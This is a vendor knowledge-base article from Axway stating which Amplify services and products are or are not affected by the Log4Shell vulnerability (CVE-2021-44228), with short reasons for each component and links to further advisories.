KB Article #181955
Impact and resolution of CVE-2021-44228 (Log4Shell) in Amplify
Axway Engineering has confirmed that Amplify SaaS services are NOT vulnerable
Context
A 0-day vulnerability in the popular Java logging library, log4j, was published on GitHub along with a POC that shows the possibility of Remote Code Execution (RCE) if log4j logs an attacker-controlled string value, CVE-2021-44228.
Axway is aware of Log4j CVE-2021-44228 and is evaluating its impact on all Axway products. As conclusions and recommendations are available we will be publishing them in the dedicated Alert on support.axway.com: https://support.axway.com/news/1331/lang/en
The current article intends to provide recommendations and technical clarifications with regards to the impact of CVE-2021-44228 in Amplify platform.
Details:
Amplify Central / Unified Catalog
Amplify Central and Unified Catalog do not use log4j and are not vulnerable.
Amplify repository
Amplify repository is not vulnerable based on feedback from JFrog: https://jfrog.com/knowledge-base/general-jfrog-ser...
Amplify Analytics
Fix is being deployed in production (Europe and US) December 16th
AxwayID
RedHat Single Sign-On 7 is affected by CVE-2021-4104. Statement from RedHat: https://access.redhat.com/security/cve/CVE-2021-4104 however AxwayID is not affected because:
- JMS appender is not configured for use.
- Changing the logging configuration is restricted to AGO.
Application Integration
Application Integration is not vulnerable as documented separately at https://support.axway.com/kb/181965
Products deployed on customer environment
Products below have no java code so are not using log4j and are not vulnerable:
Agents
Agents are written in golang.
CLI
CLI is written in node.js.